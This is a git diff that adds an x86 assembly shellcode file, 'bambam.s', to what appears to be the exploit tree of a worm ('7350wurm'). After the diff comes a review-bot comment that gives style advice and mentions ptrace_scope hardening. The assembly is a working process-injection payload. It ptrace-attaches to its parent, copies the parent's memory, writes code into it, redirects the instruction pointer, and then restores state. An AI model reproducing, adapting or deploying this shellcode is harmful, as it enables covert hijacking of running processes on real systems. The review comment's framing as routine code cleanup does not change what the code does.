Diffstat (limited to 'exploits/7350wurm/shellcode/bambam.s')
-rw-r--r--exploits/7350wurm/shellcode/bambam.s230
1 files changed, 230 insertions, 0 deletions
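--- /dev/null
+++ b/exploits/7350wurm/shellcode/bambam.s
@@ -0,0 +1,230 @@
+
+ .globl cbegin
+ .globl cend
+
+
+cbegin:
+/* getppid */
+ pushl $64
+ popl %eax
+ int $0x80
+/* movl %eax, %ecx */
+ pushl %eax
+ xchgl %ebp, %eax
+
+/* z_fork */
+ pushl $2
+ popl %eax
+ int $0x80
+ or %eax, %eax
+ je fchild
+
+ /* waitpid (pid, NULL, 0) */
+ pushl $7
+ popl %esi
+ xchgl %esi, %eax /* eax = 7, esi = ppid */
+ xorl %ecx, %ecx
+ xorl %edx, %edx
+ int $0x80
+
+ xorl %eax, %eax
+ movb $162, %al
+ pushl $10
+ pushl $10
+ movl %esp, %ebx
+ movl %esp, %ecx
+ int $0x80
+ui:
+jmp ui
+ /* exit */
+fexit:
+
+ pushl $1
+ popl %eax
+ xorl %ebx, %ebx
+ int $0x80
+
+/*** CHILD ***/
+fchild: pushl $2 /* second fork */
+ popl %eax
+ int $0x80
+
+ or %eax, %eax
+ jne fexit
+
+ popl %ecx /* parent process pid */
+/* ptrace attach */
+ pushl $26
+ popl %eax
+ cdq
+ pushl $16
+ popl %ebx
+ xorl %esi, %esi
+ int $0x80
+
+/* ptrace peekdata */
+ movl $0x08048210, %edx
+/* movl $0xbf7ff010, %edx */
+ movl $0xbffff010, %esi
+ pushl $127
+ popl %edi
+loopa:
+ movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ pushl $2
+ popl %ebx
+ pushl %edi
+ int $0x80
+ popl %edi
+ incl %edx
+ incl %esi
+ decl %edi
+ jnz loopa
+
+/* ptrace getregs */
+ movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ pushl $12
+ popl %ebx
+ pusha
+ movl %esp, %esi
+ int $0x80
+
+/* ptrace setregs */
+ movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ pushl $13
+ popl %ebx
+ movl %esp, %esi
+ movl 48(%esi), %edi
+ pushl %edi
+ movl $0x08048210, 48(%esi)
+/* movl $0xbf7ff010, 48(%esi)*/
+ int $0x80
+
+ jmp pointX
+pointY:
+
+ popl %esi
+ movl $0x08048210, %edx
+ pushl $20
+ popl %edi
+loopc:
+ movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ pushl $5
+ popl %ebx
+ pushl %edi
+ pushl %esi
+ movl (%esi), %esi
+ int $0x80
+ popl %esi
+ popl %edi
+ incl %edx
+ incl %esi
+ decl %edi
+ jnz loopc
+
+
+/* ptrace pokedata */
+/* movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ pushl $5
+ popl %ebx
+ movl $0xccccfeeb, %esi*/
+/* movl $0xbf7ff010, %edx*/
+ movl $0x08048210, %edx
+/* int $0x80*/
+
+/*ptrace cont */
+ movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ cdq
+ pushl $7
+ popl %ebx
+ xorl %esi, %esi
+ int $0x80
+
+/* wait 4 */
+/* 0 on return */
+ cdq
+ movl %eax, %ebx
+ decl %ebx
+ movl %eax, %ecx
+ movb $114, %al
+ int $0x80
+
+/* ptrace pokedata */
+ movl $0x08048210, %edx
+ movl $0xbffff010, %esi
+/* movl $0xbf7ff010, %edx*/
+ pushl $127
+ popl %edi
+loopb:
+ movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ pushl $5
+ popl %ebx
+ pushl %edi
+ pushl %esi
+ movl (%esi), %esi
+ int $0x80
+ popl %esi
+ popl %edi
+ incl %edx
+ incl %esi
+ decl %edi
+ jnz loopb
+
+/* ptrace setregs */
+ popl %edi
+ movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ pushl $13
+ popl %ebx
+ movl %esp, %esi
+ movl %edi, 48(%esi)
+ int $0x80
+
+
+/* ptrace detach */
+ movl %ebp, %ecx
+ pushl $17
+ popl %ebx
+ pushl $26
+ popl %eax
+ cdq
+ movl %edx, %esi
+ int $0x80
+/* exit */
+ xorl %ecx, %ecx
+ incl %esi
+ xchgl %esi, %eax
+ int $0x80
+pointX:
+ call pointY
+
+ pushl $2 /* second fork */
+ popl %eax
+ int $0x80
+ or %eax, %eax
+ je pointA
+ int $0x3
+pointA:
+ jmp pointA
+
+
+
+
+
+cend:
+
+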
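Review bot: Every syscall number and ptrace request in this file is a bare immediate (`pushl $26` for the ptrace syscall and `$16`/`$2`/`$12`/`$13`/`$5`/`$7`/`$17` for the request; `$64`, `$2`, `$7`, `$162`, `$114`, `$1` for the other calls), and only the block headers such as `/* ptrace attach */` say which is which, so each request-loading line should carry its name, e.g. `pushl $16 /* PTRACE_ATTACH */`, and the `48(%esi)` slot written after `pusha` (the register image handed to SETREGS, presumably the eip field of user_regs_struct) deserves a comment stating what it is. The attach at `/* ptrace attach */` never examines %eax before the PEEKDATA loop at `loopa:` starts, so a refused attach is indistinguishable from success here; from a hardening standpoint that is exactly the step a restricted `kernel.yama.ptrace_scope` denies for an attach to the parent pid, and the resulting loop of failing PEEKDATA calls is a clear audit signal. The addresses `0x08048210` and `0xbffff010` are repeated at several sites with the alternative `0xbf7ff010` left in commented-out lines; they should be one named constant each, with a comment stating what they point at, rather than scattered literals.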